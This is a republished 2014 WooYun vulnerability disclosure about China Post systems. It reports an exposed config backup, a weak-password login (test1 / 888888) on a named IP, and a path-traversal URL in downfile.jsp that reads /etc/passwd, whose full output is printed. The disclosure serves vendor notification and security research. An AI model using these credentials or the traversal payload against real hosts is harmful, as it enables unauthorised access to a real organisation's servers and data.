中国邮政多个严重漏洞打包(邮政智能终端权限泄露)

admin
admin
admin
139803
文章
114
评论
2015年7月3日13:17:17评论232 views字数 229阅读0分45秒阅读模式
摘要

2014-10-09: 细节已通知厂商并且等待厂商处理中
2014-10-10: 厂商已经确认,细节仅向厂商公开
2014-10-20: 细节向核心白帽子及相关领域专家公开
2014-10-30: 细节向普通白帽子公开
2014-11-09: 细节向实习白帽子公开
2014-11-23: 细节向公众公开

漏洞概要 关注数(3) 关注此漏洞

缺陷编号: WooYun-2014-78783

漏洞标题: 中国邮政多个严重漏洞打包(邮政智能终端权限泄露)

相关厂商: 中国邮政集团公司信息技术局

漏洞作者: 路人甲

提交时间: 2014-10-09 22:32

公开时间: 2014-11-23 22:34

漏洞类型: 任意文件遍历/下载

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 任意文件读取利用 任意文件读取

0人收藏

漏洞详情

披露状态:

2014-10-09: 细节已通知厂商并且等待厂商处理中
2014-10-10: 厂商已经确认,细节仅向厂商公开
2014-10-20: 细节向核心白帽子及相关领域专家公开
2014-10-30: 细节向普通白帽子公开
2014-11-09: 细节向实习白帽子公开
2014-11-23: 细节向公众公开

简要描述:

...

详细说明:

首先是

http://ylt.11185.cn/web.rar

web配置下载,里面是web.config 包含了一些短信接口等敏感信息

中国邮政多个严重漏洞打包(邮政智能终端权限泄露)

然后是另外一个主系统

http://211.156.198.57

中国邮政智能终端系统,没有验证码,首先是通过xml检查用户名

然后用户名存在返回工号后再匹配密码

中国邮政多个严重漏洞打包(邮政智能终端权限泄露)

存在弱口令账户

test1 / 888888

中国邮政多个严重漏洞打包(邮政智能终端权限泄露)

登陆进去系统

中国邮政多个严重漏洞打包(邮政智能终端权限泄露)

然后有个操作文档下载那里 抓包

中国邮政多个严重漏洞打包(邮政智能终端权限泄露)

是这样的连接 一看path 就知道多半是任意文件下载了

这里还泄露了web目录 原来是weblogic的程序

http://211.156.198.57/jsp/yzznzd/bbxf/downfile.jsp?filename=//opt//weblogic//Oracle//Middleware//user_projects//domains//yzznzd_domain//app//czsc.zip&paths=//opt//weblogic//Oracle//Middleware//user_projects//domains//yzznzd_domain//app//czsc.zip

构造一下

http://211.156.198.57/jsp/yzznzd/bbxf/downfile.jsp?filename=/wooyun.txt&paths=/etc/passwd

下载下来

中国邮政多个严重漏洞打包(邮政智能终端权限泄露)

code 区域 
root:x:0:0:root:/root:/bin/bash
 bin:x:1:1:bin:/bin:/sbin/nologin
 daemon:x:2:2:daemon:/sbin:/sbin/nologin
 adm:x:3:4:adm:/var/adm:/sbin/nologin
 lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
 sync:x:5:0:sync:/sbin:/bin/sync
 shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
 halt:x:7:0:halt:/sbin:/sbin/halt
 mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
 news:x:9:13:news:/etc/news:
 uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
 operator:x:11:0:operator:/root:/sbin/nologin
 games:x:12:100:games:/usr/games:/sbin/nologin
 gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
 ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
 nobody:x:99:99:Nobody:/:/sbin/nologin
 vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
 ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
 nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
 zabbix:x:100:101:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
 distcache:x:94:94:Distcache:/:/sbin/nologin
 ais:x:39:39:openais Standards Based Cluster Framework:/:/sbin/nologin
 mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
 pcap:x:77:77::/var/arpwatch:/sbin/nologin
 cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
 dbus:x:81:81:System message bus:/:/sbin/nologin
 apache:x:48:48:Apache:/var/www:/sbin/nologin
 avahi:x:70:70:Avahi daemon:/:/sbin/nologin
 rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
 amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash
 oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
 postfix:x:89:89::/var/spool/postfix:/sbin/nologin
 mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
 smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
 quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin
 postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
 radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin
 named:x:25:25:Named:/var/named:/sbin/nologin
 dbmail:x:101:102:DBMail Daemon Account:/var/lib/dbmail:/sbin/nologin
 ntp:x:38:38::/etc/ntp:/sbin/nologin
 ident:x:98:98::/:/sbin/nologin
 mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
 hacluster:x:511:90::/home/hacluster:/bin/bash
 sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
 webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
 privoxy:x:73:73::/etc/privoxy:/sbin/nologin
 dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
 radvd:x:75:75:radvd user:/:/sbin/nologin
 squid:x:23:23::/var/spool/squid:/sbin/nologin
 xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
 rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
 nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
 haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
 ipos:x:512:512::/home/ipos:/bin/bash
 oracle:x:513:513::/home/oracle:/bin/bash
 yzznzd:x:514:512::/home/yzznzd:/bin/bash

漏洞证明:

见详细说明

修复方案:

修复弱口令,限制下载path。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-10-10 18:22

厂商回复:

谢谢

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin